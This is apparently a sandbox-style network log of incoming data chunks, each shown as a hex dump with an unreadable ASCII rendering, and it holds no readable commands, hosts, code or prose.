2023-03-17 13:34:27 UTC	41	IN	Data Raw: 11 7b 71 90 2c a8 5c a9 ed 25 5f 5d 6c c2 d3 1f 7b df 6d b0 b2 f5 dc c3 17 76 9d 70 1c b5 ec 54 d2 56 de 9d 1f 7f 15 ea 9c e6 f3 8e 8d 53 55 cc 2f 9a 74 c7 1a 6c 0f 96 00 5b 28 89 d9 e6 5e ab 53 ce bf b1 7c fd 50 28 3f 36 bc 90 6c 9d 62 4c d6 4d aa b6 45 b0 26 a5 12 26 96 ef 33 c7 be ce c7 11 9d 20 c7 77 66 43 c3 0a 10 33 39 69 d4 9b ca 64 5a 53 d9 ae 4e 3f 00 eb 28 41 39 86 ee 89 b9 d5 9a 17 97 59 20 a7 94 c9 8b c8 89 ad 53 9c 63 43 73 9a 36 9d e2 1a 2c 64 8e cd cc 5c f6 7c 0d 80 6b 18 42 06 0c e4 80 04 de 79 60 63 38 43 1b 2b 7c 7a 3b 52 46 f2 e7 f3 7b 8f b8 9e b4 a7 66 d6 d9 72 63 0f 65 b5 91 29 5d ae 6f 49 bb 00 79 bf 8b bd 36 b9 ac 2c 26 d9 40 87 54 04 e4 b2 80 ef d9 d4 3c fd b5 c1 fd be bb ec fc f8 2a 43 66 ed 88 13 3b 38 12 bf bf 56 49 bf db a6 1c Data Ascii: {q,\%_]l{mvpTVSU/tl[(^S\|P(?6lbLME&&3 wfC39idZSN?(A9Y ScCs6,d\\|kBy`c8C+\|z;RF{frce)]oIy6,&@T<*Cf;8VI
2023-03-17 13:34:27 UTC	42	IN	Data Raw: 13 c8 3f f7 6f cf 8e 7b 59 36 76 31 93 04 32 f0 75 cf e2 d5 46 17 58 9c c3 26 ab 55 4a 22 a6 80 aa 67 c0 a2 96 b5 88 54 b2 3d 9c 02 93 4a 28 2c 55 db dd 37 0e 00 2f c4 2a 96 b5 bc da 3a c9 ac 9b ce 35 64 b8 06 b6 97 cc 07 f6 98 71 e8 5c df f6 7c 1b 6c e4 e2 23 2e ec 2c 58 4e dd 9c 59 26 92 ea 9a 98 ab f2 0c f4 15 ee 21 d9 36 7b be 98 f2 b4 59 1f 06 eb 35 f3 45 41 ba 26 7a b4 84 10 12 f8 55 4e 37 c7 61 9a e5 5a 3c 3a 4e b5 5c fe 64 b6 6a bc d8 65 e9 50 7f ce 7b 92 a4 2b 56 ef f8 22 37 1f 71 dc f0 7d 06 70 df 67 98 d7 f6 4d 2b 77 f1 70 ed 4f f5 38 b6 50 5b bd a8 59 1f 6b a5 0b 36 07 7e 20 8a 3e f6 5b e2 90 09 14 cb 7b f9 dc 84 57 92 38 f2 9f 92 c8 3c 81 b8 bf fb ae 74 7a bb ab 4a 15 4e 70 13 31 3a d0 40 32 68 33 06 fc 31 ae e0 65 92 67 0f 99 92 08 8a 06 eb Data Ascii: ?o{Y6v12uFX&UJ"gT=J(,U7/*:5dq\\|l#.,XNY&!6{Y5EA&zUN7aZ<:N\djeP{+V"7q}pgM+wpO8P[Yk6~ >[{W8<tzJNp1:@2h31eg
2023-03-17 13:34:27 UTC	43	IN	Data Raw: 90 f3 1c 72 e1 d3 40 83 74 b0 7d 28 9c 13 48 01 75 63 47 a5 15 dc dc 37 9a 6d f8 43 44 16 d9 1e 4d 71 f0 6d b3 61 fd 83 b3 bc ee f7 f2 c2 63 61 c2 5b a8 e3 6c 6b 74 0c ed 85 90 7e 87 96 af 3b c7 a0 3d 21 af be ad 7c 32 8b af 8b 6f d4 d9 3b e8 b2 b3 e9 91 ac 4a 80 e2 3a 44 71 f8 b2 f4 d4 c0 9f 9c 97 88 29 f5 ee 93 1c 2b c8 99 e7 1c 72 3b 03 55 01 b4 83 53 cd 34 b4 bc 4a fb 98 5d 4a 5e ea 40 ce ef c8 f9 f1 cf 65 3f 10 20 26 50 c8 0c a8 f7 c7 af b0 d4 25 2b 13 c7 08 47 55 73 82 a0 fd ed 0f eb b9 81 ef f1 50 d5 c4 1a 51 20 1c a0 7c 36 fc 0e 63 b5 d5 1d b2 1a 3a 48 43 bd 25 64 52 91 da fe da 9a 32 be 8a 13 59 0b e0 a7 fa b8 9b 49 bd 4b 8e 0e 26 e2 30 0b 23 e7 00 43 06 f2 e5 03 a0 11 04 4f 9a 10 65 60 c3 38 e3 8e 9f 37 12 22 ba 79 ae d3 36 8d 29 ee c9 7d 8a 3c Data Ascii: r@t}(HucG7mCDMqmaca[lkt~;=!\|2o;J:Dq)+r;US4J]J^@e? &P%+GUsPQ \|6c:HC%dR2YIK&0#COe`87"y6)}<
2023-03-17 13:34:27 UTC	44	IN	Data Raw: 65 e9 4b 69 2f 64 e5 a0 26 47 e9 a6 53 69 92 3e f4 b6 7c 23 6c a7 f9 d9 a4 99 ee 0e 66 f3 d5 ba b6 a0 83 ee 3f 31 1e 8d 46 28 69 2f 4b 2c 75 45 0d 82 77 67 7f f9 81 0b d9 f5 66 8b 99 b2 8d f1 9c cc 0f 95 f0 21 93 b5 c1 f7 bf 73 0c 45 81 62 23 21 6d 18 b1 37 dd 47 27 6f 41 12 d3 26 08 9c 7f 82 60 18 8c a8 ef 65 fe 66 52 02 d2 fa 8e b4 bf 73 d8 84 ad 7a 52 38 a0 43 ec 79 91 00 07 b7 2a f8 4a 4c 71 6c 97 f5 92 00 50 04 3e 37 e7 b4 43 98 80 16 21 a8 8c be 19 f8 c2 0f 88 6f 5c 88 47 4c fa 5a 22 35 0e 44 9b 0e 17 fb a2 3a a1 f4 fe e3 1f e4 05 44 f4 71 3a 68 c4 69 14 e4 f0 af f2 30 7d ea a0 d8 89 fd 21 1f 69 c3 ef 5a 78 13 b2 5b ce 70 84 81 51 7f f2 50 91 74 c0 71 66 03 be 40 4c f2 90 5f fb 4d ac 6f d9 be a0 7b ed 97 3c 4a c8 9c 81 1a cc 9f b3 29 b4 a7 b1 8a a7 Data Ascii: eKi/d&GSi>\|#lf?1F(i/K,uEwgf!sEb#!m7G'oA&`efRszR8Cy*JLqlP>7C!o\GLZ"5D:Dq:hi0}!iZx[pQPtqf@L_Mo{<J)
2023-03-17 13:34:27 UTC	45	IN	Data Raw: 80 d0 21 25 3b 8d 08 72 7d 31 92 a0 e8 d9 61 fc b8 8b cd e6 80 90 ce 61 7e 4a 06 de 16 3c fc 0c 62 83 9e 1d c4 39 7f 3b a2 90 0d 52 3d 8b d1 7e bc bc 34 92 ef 13 59 7f 8c af c3 8f e9 56 bc 4c e7 19 2f ca 0d 1c f9 fe 12 27 70 bf dd 64 b6 9c 07 48 8b 16 32 99 96 41 d9 e1 f2 1e 50 25 b7 74 1d c0 50 9c 16 c6 fa 13 97 37 15 d5 e5 05 19 a2 9c fe b3 0a 76 9e f7 cf e5 44 b5 8a c0 3a 30 b3 82 5f d7 b2 d2 70 62 a7 db 33 c4 49 1b 03 da 23 77 97 e3 ae ea 3e ff 44 24 e1 f1 60 22 77 4c df 79 4b a6 0d 7e 5d 64 e2 26 3b f3 3e d2 73 95 09 38 59 4c c7 11 95 09 83 d3 7c b8 4a fa 57 61 e9 b1 e2 06 ac f7 6f 30 fc 8a 8b 67 ba 13 ba ba 8a 5b 62 87 ca 70 a0 78 23 44 7a f0 5e 37 0f 2f 2a d8 5c 11 e7 bc de 2a 66 a1 ca bc 84 24 38 7d 9e d5 c9 07 fc 2b 65 f3 9b c0 e2 60 08 6e ec c8 Data Ascii: !%;r}1aa~J<b9;R=~4YVL/'pdH2AP%tP7vD:0_pb3I#w>D$`"wLyK~]d&;>s8YL\|JWao0g[bpx#Dz^7/\f$8}+e`n
2023-03-17 13:34:27 UTC	47	IN	Data Raw: be 84 c0 03 f8 c2 0a 1d 36 5a 06 52 65 69 5a 67 3f 0e 52 93 7e 99 d3 b5 31 ac f7 02 9c 29 ba 75 6c b6 ff 53 b4 cc e7 7b 80 35 78 e5 e0 fb b7 d2 39 af f1 58 78 7a 4c 86 74 14 14 9a 34 ce 0e d0 8d 59 42 d7 59 98 fa ae 60 23 02 be 42 d5 41 ab ca ed 5e a1 57 cc a9 a8 72 64 ef 45 66 27 bb 85 e4 ca 54 b0 a7 db 82 25 9b a0 09 8d 21 2e f9 77 20 c9 b4 f5 93 62 d6 2b 19 7d 75 6c 93 13 07 5c ac 69 d4 91 d9 75 5f 44 e1 e3 4f 3f 60 ea 37 59 a4 dc ee 89 fc c6 9c 08 01 33 24 a7 e9 db 8c c1 dd ab 5a 03 0a 74 25 b3 21 96 e2 01 5a ba df cb b5 fa d9 62 25 19 61 18 4e 75 02 e1 9e 13 d2 68 0c aa 8c 43 6b 4e 66 6a 3e 45 66 9b 82 97 7b 85 b2 83 b9 8f 52 b8 97 73 64 6a 7e a5 94 40 d3 74 7c 45 be 1b 6f 8f 9f aa 35 37 c2 52 b6 ab af aa 47 7d a3 1e 81 ef d5 c8 32 83 30 b3 f8 9c a8 Data Ascii: 6ZReiZg?R~1)ulS{5x9XxzLt4YBY`#BA^WrdEf'T%!.w b+}ul\iu_DO?`7Y3$Zt%!Zb%aNuhCkNfj>Ef{Rsdj~@t\|Eo57RG}20
2023-03-17 13:34:27 UTC	48	IN	Data Raw: 82 d7 11 2e c9 c0 48 19 7d 5b 59 03 1c a6 0c 5c 99 6e e2 2c 17 d9 34 c5 af ae 46 28 53 57 dd 2a f6 f2 6f 2a b3 ad 7c d5 72 67 fa b3 c9 3b af df 3f 38 d4 bb 55 67 b0 00 b3 84 99 51 11 08 80 70 d0 6b 01 5c 2a f5 5f 27 4a 0a 3c c8 4f ad bd bc 0b 28 c4 84 91 ce 35 7f 38 12 aa bf df 06 f6 83 04 9e c4 cc 81 45 5a 7d e2 d6 c9 d0 15 a0 47 4f 03 8a 77 09 8e d1 9a 92 b2 e8 7e b9 0f ee 51 c4 65 78 be b2 b2 8d 4f 6d bf a5 35 83 f4 55 ae 32 3a 9d c7 11 78 f3 73 48 0f a2 61 9a ab 56 34 02 21 86 58 fe 0e ba 6d 94 a6 65 e9 4b 6b a3 e0 f0 b3 5a 40 68 89 1e 74 1e 15 e0 a2 55 b0 7a d5 6d b6 9f e9 4c 21 66 76 25 9f ae d3 10 82 3e 41 b6 80 64 39 6d 87 46 73 06 74 26 91 03 cc 49 e7 81 0a 68 d6 6b fc c9 94 b5 a3 3d e4 8c 92 d8 10 80 b8 b5 ef b7 67 1b 5d fe d5 2f 21 1d 01 3b 24 Data Ascii: .H}[Y\n,4F(SWo\|rg;?8UgQpk\*_'J<O(58EZ}GOw~QexOm5U2:xsHaV4!XmeKkZ@htUzmL!fv%>Ad9mFst&Ihk=g]/!;$
2023-03-17 13:34:27 UTC	49	IN	Data Raw: c4 9e 05 8a 78 21 b4 ef f0 ba cb cc ad 54 a5 58 5c 6f b8 32 94 f6 03 57 de 51 87 bc 04 a3 76 15 07 62 18 44 74 36 f3 91 05 59 2c 12 82 1e e1 4e 53 14 ca 71 54 10 dc 8d 97 7b 85 10 81 b7 8f 5e c4 d5 66 77 6d 6a a7 9f 37 c7 d3 7c 4f ac 36 68 90 00 af 39 a8 a3 15 1a ab af aa 45 7d 9a a5 90 e3 ce d4 2a e2 a3 bc d0 20 bb 9c 99 Data Ascii: x!TX\o2WQvbDt6Y,NSqT{^fwmj7\|O6h9E}*
2023-03-17 13:34:27 UTC	49	IN	Data Raw: cd 10 43 60 f4 9f 04 3b 30 76 0d 84 65 28 e3 ea 82 0d 20 d4 10 c1 27 5a 6b 09 7d 30 6a 83 59 37 27 a8 bc 4b d3 b5 5d 4a 47 c2 06 cf b8 c3 d1 b4 a4 64 35 03 37 26 50 d9 58 80 cc c6 b4 8a f8 72 57 12 cd 1b 13 52 5b a8 a0 e2 fb 34 ee ac 92 f6 f1 1f da c4 1a 6a 72 04 2d 75 3c fc 09 35 bc c5 1a 38 43 3d 3a a3 38 00 03 4f 4c 91 fe ac 94 76 97 ef 19 fb 12 f9 be d6 98 8c 5d ae 5b f5 06 3f fa bb bb f9 f4 07 70 03 e2 41 07 ae 00 16 60 b0 17 17 85 f5 2b 82 f5 93 20 03 33 a6 66 ae db 6c 3e 01 ee b3 3a ac 3d 33 a1 96 1c 08 a9 a2 0a a0 3e 6d a7 d2 d3 71 52 a3 10 fe 12 34 bb a0 4c ec b2 d8 6e c0 72 91 33 b5 77 bb 00 da 29 5e c5 f6 ba c8 a0 ba 45 2e c3 d9 67 22 7d 4a 4a 03 70 a6 0c 5c 31 32 e2 2c 19 db 24 fa 91 bd 4c 33 4a 5d c0 07 98 7f 8d f0 6d cd 4a e0 51 ea f9 b9 da Data Ascii: C`;0ve( 'Zk}0jY7'K]JGd57&PXrWR[4jr-u<58C=:8OLv][?pA`+ 3fl>:=3>mqR4Lnr3w)^E.g"}JJp\12,$L3J]mJQ
2023-03-17 13:34:27 UTC	50	IN	Data Raw: 23 1f e3 26 cc 43 33 de 78 e3 6e 16 9e f9 51 9a 01 93 7a 44 0c ea a1 3e ae 6a aa 8b ec 74 22 01 f4 6b aa 73 4f 0a a5 b8 71 96 09 6d 71 1c 35 dd ff 00 50 0e 41 70 e7 b4 23 19 e3 16 31 ac 8c be 77 f8 c2 0e 80 6f 5b 88 8a 4d fa 5a 37 35 0e 44 9b 63 2a 81 b5 4b a3 8c df a7 57 94 5d 03 b2 71 30 69 bd 36 13 97 e5 a2 fa 59 16 ec d2 33 b9 92 20 70 73 c8 ef 54 31 75 9b 3e c4 02 e5 df 59 36 ae 22 91 74 cd 1e 75 6d de 47 5b 22 84 36 9d 5e ab 5d ce b7 cf 1b eb 86 31 2e 48 da 80 6a a9 82 ba 46 d2 ab b6 91 b7 6c ef 27 26 9c e5 28 a6 de e7 97 1b 8a 45 7a 76 66 63 82 1e 7f 53 38 69 de 8c b6 00 5b 53 84 af 46 50 0a eb 28 4b 3e e9 9c 89 fd df 9a 1e e3 0c 25 a7 e2 ee 83 a7 aa ac 53 87 0c d7 6f b2 2b 91 ea 7f 39 ad ce c7 d3 ff b0 7c 07 99 65 10 2b 1d 12 e5 8a 02 dc 74 39 82 Data Ascii: #&C3xnQzD>jt"ksOqmq5PAp#1wo[MZ75Dc*KW]q0i6Y3 psT1u>Y6"tumG["6^]1.HjFl'&(EzvfcS8i[SFP(K>%So+9\|e+t9
2023-03-17 13:34:27 UTC	52	IN	Data Raw: cb f7 8e 73 1c 24 b7 7e bf d4 44 88 27 11 46 ed b8 c2 cc 54 c7 fa e6 59 fc 64 4c f5 24 6c 01 09 0e b8 4a 75 a2 d6 cb 44 dd 9b 28 4d 40 9b ef df 31 cc 4b a0 37 ff 25 dc c6 7c 08 45 7b 77 00 bb f0 f3 c3 6c 25 62 a5 63 28 5c 8d 0d 51 5c 67 e2 2c 13 c8 3e d2 79 19 b3 c6 a6 98 f4 61 c0 0d 90 d4 79 43 5a fa 50 99 f9 e6 d2 21 51 f6 30 c6 c5 c5 cf 67 b0 01 9b 9a 99 51 1a c6 46 50 e3 6b 22 dc df 91 5e 37 04 70 34 e5 52 b5 e5 bc de 21 c4 82 f7 ce 35 6f 28 0d b6 96 c8 06 f6 7e 7a fe 86 34 f1 6d 1c 66 d2 da c3 42 11 d3 58 18 03 8c 6d 0e a6 c2 ca 92 b8 f6 0c c3 bb e5 39 de ec 6c 68 a2 b1 b1 54 01 8b b1 35 f3 57 52 be 3c 20 b1 87 ca 6b fc 4e 43 31 d4 67 86 ac 4b 39 2d ab 84 49 fb 07 be 94 be fd 76 e3 50 75 fd 6d a7 be 3c 3c ef b2 45 75 1f 01 ea bb 6c 03 6d 2b 66 8d af Data Ascii: s$~D'FTYdL$lJuD(M@1K7%\|E{wl%bc(\Q\g,>yayCZP!Q0gQFPk"^7p4R!5o(~z4mfBXm9lhT5WR< kNC1gK9-IvPum<<Eulm+f
2023-03-17 13:34:27 UTC	53	IN	Data Raw: 77 fc 95 3e 23 2b b9 fa 1c a3 82 b6 3d 4c a9 a5 9c b1 04 a1 1c 3a 9a e7 5b bf be e6 93 9f f4 39 1c 6a 6a 6b fe 60 10 33 3d 4c c7 93 c8 6c 0a 51 f5 d9 4e 3f 6e 64 41 50 2d 50 f9 5f 70 f5 9a 16 8e 41 55 a6 e8 c2 ff c6 cc ad 48 dc 63 77 7b b2 3e 95 ee 12 4f a8 d9 1b 31 54 b0 7c 0f f7 17 18 44 71 13 fa 8b 0e c4 7a 01 8b 09 50 61 7c 53 7c 3b 54 7f f8 c3 94 78 fc d8 93 bc 94 4b bd aa 19 65 60 74 9c fd 2e 4a 7e 6d 45 b5 cb 0d f5 9d bc 3c 91 c7 3c 21 a1 87 cd 55 74 81 b7 a9 f8 de d9 3d ff b4 ac f5 9a b8 ef f9 e4 2b 49 7f 9a e6 67 41 3e 60 96 bf 25 38 d0 cc b1 e2 28 d1 9a f8 0c 76 62 1c 5b 07 7b 85 50 30 66 ae a3 45 f7 9a 4c 4c c9 c2 54 cf b8 cf ea fa ba 74 33 12 21 20 d4 d9 43 80 e2 c7 b4 86 c3 29 48 03 cb 0a 13 53 00 f9 a1 e2 fb 36 f7 cb f3 e4 83 8a 81 c2 19 13 Data Ascii: w>#+=L:[9jjk`3=LlQN?ndAP-P_pAUHcw{>O1T\|DqzPa\|S\|;TxKe`t.J~mE<<!Ut=+IgA>`%8(vb[{P0fELLTt3! C)HS6
2023-03-17 13:34:27 UTC	54	IN	Data Raw: 32 25 c5 96 c8 0d e0 77 77 ec 93 dd e8 41 48 62 d4 d0 c1 ab 65 d3 58 4a 12 89 6d 04 70 65 ba 92 b8 fe 24 aa 44 ee 2b d1 93 08 be b2 b7 b9 5f 6c 6c ea 35 f9 47 4f c9 4d 2c b5 8e 38 14 f8 55 44 36 c8 77 0c d2 31 3d 3b 5f ad 34 ff 18 bd 42 d1 9c 65 e3 50 70 c6 f1 0d dc 5f 57 e5 80 63 f4 1f 01 f0 b6 62 3e 76 d7 1c e8 a4 e9 48 3a 74 eb 7d 49 21 f2 38 c6 3d 43 ad ae 2c 53 6c 8d 64 27 09 07 47 83 07 cf 72 8e 91 0e 71 c1 75 ef 4c e0 e6 80 3e ee a4 f9 f1 2b 8a a9 b0 eb 29 00 63 55 8c 40 4d 4d 6c 12 3b 2d d2 5f b5 1c 2a 02 d4 3b f6 e3 79 93 6d 21 e7 97 0f 91 10 96 4b 94 bb c2 bc 9d 8b 75 5d f3 3c 74 52 14 ef 7a e0 71 34 75 07 9d 6f 97 20 4d 71 66 e9 9b 80 00 5a 2c 1a 37 e7 be 3f 67 81 05 2b b9 96 87 de f8 c2 0e 8c 65 54 8a 40 3b fa 5a 63 24 0b 44 91 c7 84 f3 b5 3b Data Ascii: 2%wwAHbeXJmpe$D+_ll5GOM,8UD6w1=;_4BePp_Wcb>vH:t}I!8=C,Sld'GrquL>+)cU@MMl;-_*;ym!Ku]<tRzq4uo MqfZ,7?g+eT@;Zc$D;
2023-03-17 13:34:27 UTC	55	IN	Data Raw: 5c 50 5f eb 83 74 50 60 18 20 26 d9 1b 4d 4c 1e 61 44 63 6f 12 d4 bc 9d 09 73 eb 24 c7 9f 63 b8 ae c6 2f b2 5f e3 d4 b8 72 16 e3 c7 93 fc aa e9 92 7c ac 02 8d 57 43 42 02 67 a2 07 b4 15 bf 80 41 36 06 9e 5c 9b c0 d2 c9 d9 af 00 b1 57 08 2d 4d 7f 2f 1b ad ed 38 49 f8 aa 8c f7 5a 1d 0e 90 06 47 7e 5d 79 7f 6f da 91 86 99 5e 5b 89 c3 43 f3 ef 55 11 e6 4b ee d6 c1 5d 65 4d e8 c2 74 b5 02 23 43 a5 6a 10 ec 57 fc 13 50 cc 76 65 b6 9c b1 1e ea 00 1f c9 e3 c6 09 f9 aa 63 08 22 eb 24 ec fb b7 33 ea e8 70 33 c5 6c 1e 8c c8 ed db a5 80 40 2b 09 76 fe 11 f7 ec 68 c2 53 55 7a fa b5 58 4b 64 1e f4 83 6c 20 cc 68 4c b3 95 28 19 37 ac 81 65 d1 f7 da 64 10 20 91 33 b4 5f 0e fe 25 dc a8 a3 82 fe c2 88 fe 50 d0 ca cc 76 dc 7e 04 54 3d b5 a7 53 a8 08 11 a6 2c 13 c9 16 e6 79 Data Ascii: \P_tP` &MLaDcos$c/_r\|WCBgA6\W-M/8IZG~]yo^[CUK]eMt#CjWPvec"$3p3l@+vhSUzXKdl hL(7ed 3_%Pv~T=S,y
2023-03-17 13:34:27 UTC	57	IN	Data Raw: fd 29 fb c0 bf fc bb 62 0e 45 87 9c ea 3e 6d 12 33 2d cd c9 4a 78 9b 14 02 bc e1 8f 78 92 1a 74 8a 96 0b 84 2d 94 44 11 1f f5 86 91 9a 63 56 e7 a9 ae 41 08 e6 50 f5 4b fd 02 07 9d 74 ca 47 5d 61 7d 8e 7a 9f 00 50 06 12 4d e7 b4 2d 86 89 7c cf aa 9f a4 4c e2 fb 19 91 5f 58 97 14 40 f8 4b 77 24 17 da 85 11 0b d1 ce 40 a1 fe 88 dd 41 e5 75 6a a4 8f 3b 71 d5 78 09 ae 7e af f2 36 69 dd df 3b d5 88 51 70 77 b1 85 5d 5e 1f e4 50 cf 70 84 a5 2a 47 c1 5b 87 8a c6 0d 61 13 a2 6a 3f 37 b2 54 ef 25 d3 57 ce bb b1 7d fb 8d ed b7 38 bb 81 68 d8 ff b2 29 b6 bb af b3 48 03 8d 2c 24 ed 96 20 c9 ba f7 90 62 f7 2b 19 7d 77 66 f1 7d 11 33 33 41 b8 9a d9 6e 4b 40 fd dd 4f 3f 60 c2 44 40 29 8c c6 e4 fc d5 90 07 9c 78 3d 28 f6 c8 8b ca b7 d7 53 8d 67 eb 00 c7 20 9c e8 b2 5e 94 Data Ascii: )bE>m3-Jxxt-DcVAPKtG]a}zPM-\|L_X@Kw$@Auj;qx~6i;Qpw]^Pp*G[aj?7T%W}8h)H,$ b+}wf}33AnK@O?`D@)x=(Sg ^
2023-03-17 13:34:27 UTC	58	IN	Data Raw: c9 e3 ab 0e f9 aa 46 0f 22 eb c5 eb fb b7 e6 ed e8 70 64 c2 6c 1e 27 cc ed db 1c 84 40 2b fa 72 fe 11 64 e8 68 c2 33 50 7a fa 38 5d 4b 64 cc f1 83 6c 7b 0d 9f b8 1d 71 29 d6 32 47 55 9b db 4e 27 9b 3f dc 6e cc 39 a3 69 ff 54 df 89 7c 65 46 3d 77 0f b8 d1 36 3b 9c dd 82 ae af d4 b4 e8 f1 a9 e6 2a 1f d3 ec af c3 2d 86 c4 b1 c6 a6 cd 29 eb 7b 9c 6d 2a 92 14 a4 02 b9 87 07 46 25 db 52 08 90 27 2a 4e 74 3d 4e ff 4c c7 67 ae ef ad 7e 8f 2f dd d6 a3 08 4e a0 c8 f1 d4 06 c0 58 9a aa 42 ee 28 d3 af dc c9 70 6c 38 0d b6 97 c8 07 f6 21 88 00 75 12 d1 18 58 7d e2 dd d7 2e 10 d4 4e b0 00 d3 74 18 58 eb c5 6c a9 88 48 dc 45 ef 09 e7 e8 7b b4 6c 75 88 6a 1f 0c 6b 1d 91 56 41 b0 5c 25 99 82 38 28 f9 55 44 27 c1 4b db bd 5a 3c 3a 55 85 58 ff 18 b7 6a 81 94 65 e9 13 76 d1 Data Ascii: F"pdl'@+rdh3Pz8]Kdl{q)2GUN'?n9iT\|eF=w6;-){mF%R'*Nt=NLg~/NXB(pl8!uX}.NtXlHE{lujkVA\%8(UD'KZ<:UXjev
2023-03-17 13:34:27 UTC	59	IN	Data Raw: ae 6e c2 38 e1 82 be 41 b9 a4 fc 7c a6 12 80 91 5e c2 b8 bf 85 da 85 2c 13 26 bc c4 68 a3 82 b2 29 b2 aa b6 27 5f fc 72 f8 06 e3 a1 20 c9 bf f2 69 12 9a 3c e7 74 39 61 94 e8 11 6c c7 78 a0 df d9 64 5b 7b ba af 4e 35 b4 2c 08 72 29 8c 6e a1 9f d5 9a 1c f6 61 08 a1 c0 98 8b c8 c6 ad 55 a7 62 4c 6f b2 20 9c e3 10 f3 6e ce c1 12 74 b0 7c 16 ba 62 18 52 74 13 e5 dd 02 d5 6f 12 82 37 13 6b 44 6c 7b 24 aa 6b ec c2 83 68 8b ab 9f be e5 2c d7 d9 76 ea 09 6d b1 87 3c 4c 5f 4a 55 a0 11 05 fe 9c bc 32 a8 ad a7 4e c7 af a0 5e 70 e4 c3 81 ef d5 b6 41 ed b2 b9 ee 68 ba 8f 94 f4 2c 6f 69 e5 81 05 2c 2c 64 b7 87 56 39 ce cb b6 1a 3c 14 99 ef 0d 5c 7a 06 64 cf 75 8a 5e f6 71 bd 42 4b e8 90 4c 42 61 ed 5f c4 b5 dd f3 da aa 7b 34 1d 32 25 41 cc 60 b4 f6 c6 b2 8a fb 25 8a 97 Data Ascii: n8A\|^,&h)'_r i<t9alxd[{N5,r)naUbLo nt\|bRto7kDl{$kh,vm<L_JU2N^pAh,oi,,dV9<\zdu^qBKLBa_{42%A`%
2023-03-17 13:34:27 UTC	60	IN	Data Raw: e4 e4 4f 22 61 4f 3d c9 52 b5 ef bd de 2d d7 9c cc db 5a 59 39 0d b0 84 d1 1a 7b b6 76 ff 8b e9 e7 1f 67 29 e2 ac 61 f5 04 c2 41 ec 26 94 0e b5 8e ea ea 30 9d e5 1d cb e7 cb 3b a1 d9 5a be c2 11 8d 42 0e 1e 49 10 ef 24 02 9b 26 5d 17 ac 93 78 f9 5f 5d 31 b9 6a 9a a1 5e 2d 2d 7d c3 58 fe 12 37 61 bc 9d 61 e9 50 6b c6 b1 a9 a7 3b 42 f4 99 90 1d e1 05 e7 ac 6c 1c 40 bd 98 61 5b c1 1b 2a 71 fc 51 e1 36 d2 38 c2 50 c6 bd a8 55 2a 76 a6 7c 24 1c 5c a4 83 07 cf 49 fe 81 12 53 88 7b f9 dc b5 8d 93 25 cc 05 94 f0 21 93 a5 ae e1 92 92 d6 5b 9e 51 9b 37 7e 12 31 27 b2 46 23 6f 4b 03 08 31 de 51 68 b6 4f 3d 8a 96 05 88 1f 99 7a 52 0c ea a1 42 8b 73 f2 cf f2 74 52 12 f0 43 ec d5 4f 00 07 80 6b e4 4a 8f 71 6c 97 fb 81 00 50 04 69 36 e7 b6 29 99 80 96 30 a8 8c 91 5d f8 Data Ascii: O"aO=R-ZY9{vg)aA&0;ZBI$&]x_]1j^--}X7aaPk;Bl@a[qQ68PUv\|$\IS{%![Q7~1'F#oK1QhO=zRBstRCOkJqlPi6)0]
2023-03-17 13:34:27 UTC	61	IN	Data Raw: 60 74 a7 8a 04 58 66 67 67 25 12 7e 8d 8f a0 27 a5 83 65 20 ab a9 86 54 66 90 87 08 ee df d3 28 f1 a3 ae d5 77 65 93 81 fe d5 55 73 fe 8c 0f 45 3e 60 9c 9d 56 e5 d0 c6 79 0c 0e ea be e9 1c 50 78 1d 55 23 3a 83 53 ed ab a8 bc 60 ba d4 5d 4a 4f ea 40 ce 1e c9 f9 f1 b8 64 3f 10 f3 26 50 c8 46 a8 f7 c6 b4 80 d0 25 55 12 c7 08 82 54 73 93 8f e2 f1 27 53 b9 81 e5 8c 80 90 c4 6a 79 66 1c a0 76 3c fc 09 10 aa d4 dc b5 11 3d f8 a3 9a 25 04 3d 8b db ba dc bc 35 8d df 17 59 d9 ed af c3 eb 9a 49 ac 4c e1 01 2d f6 3d 0a f5 e2 0b 4a 0f dd ca 15 a1 1b 76 18 dd 17 67 a7 66 39 93 eb aa 1f 13 24 bd 6d bb a6 6f 89 01 9e aa 17 86 39 bd c2 93 fb 18 b5 b2 8a b5 26 79 4e 62 f7 60 47 b5 9b d2 3a 33 ad b9 6c fc f6 c9 63 01 28 0b 20 bd 4e 9f 72 b9 77 76 f3 df 39 c3 88 f5 57 24 d8 Data Ascii: `tXfgg%~'e Tf(weUsE>`VyPxU#:S`]JO@d?&PF%UTs'Sjyfv<=%=5YIL-=Jvgf9$mo9&yNb`G:3lc( Nrwv9W$
2023-03-17 13:34:27 UTC	63	IN	Data Raw: 2d 82 07 c5 9f e3 90 0e bd d1 7a f9 ca 93 8d 81 7a e4 8c 94 eb 1b 84 b8 67 fd bf 73 68 54 8c 5b 65 21 79 18 25 37 cb 4b 35 62 5e 19 fc 26 df 8f 72 e1 a5 5e 8a e6 27 19 00 99 58 2a 25 eb ab 96 98 77 aa a5 bf 74 22 03 f5 52 e8 fd 26 16 f9 9c 78 e2 5b 4a 5d 69 4a 69 80 00 50 04 78 32 f4 b3 3f 8a 88 3d 75 b9 8b af 55 62 d1 07 82 56 2a eb 6f 4d 8a 72 e4 34 0e 5f 88 1b 1a d9 3b 52 b7 00 8e e6 5c f5 7e 40 ba 60 30 74 54 62 05 9a ef ae fb 25 7a fc de 15 a4 ec 58 58 2a c3 ef 5a 78 3e 8c 3e ce 61 86 9a 8f 55 c9 40 99 65 c0 90 14 fc ba 55 56 39 8e 74 43 57 b8 59 df b1 99 59 eb 86 3b 38 20 c8 05 6b a3 88 a1 39 a3 ba d9 10 a0 03 87 35 37 e5 60 21 c9 b4 f5 85 00 8f 3b 08 18 63 69 82 3d 03 3c e7 67 d4 8a c9 48 52 42 9e c0 4f 3f 6a e0 28 9d 38 89 81 a7 fc d5 9c 05 9f 7f Data Ascii: -zzgshT[e!y%7K5b^&r^'X%wt"R&x[J]iJiPx2?=uUbVoMr4_;R\~@`0tTb%zXX*Zx>>aU@eUV9tCWYY;8 k957`!;ci=<gHRBO?j(8
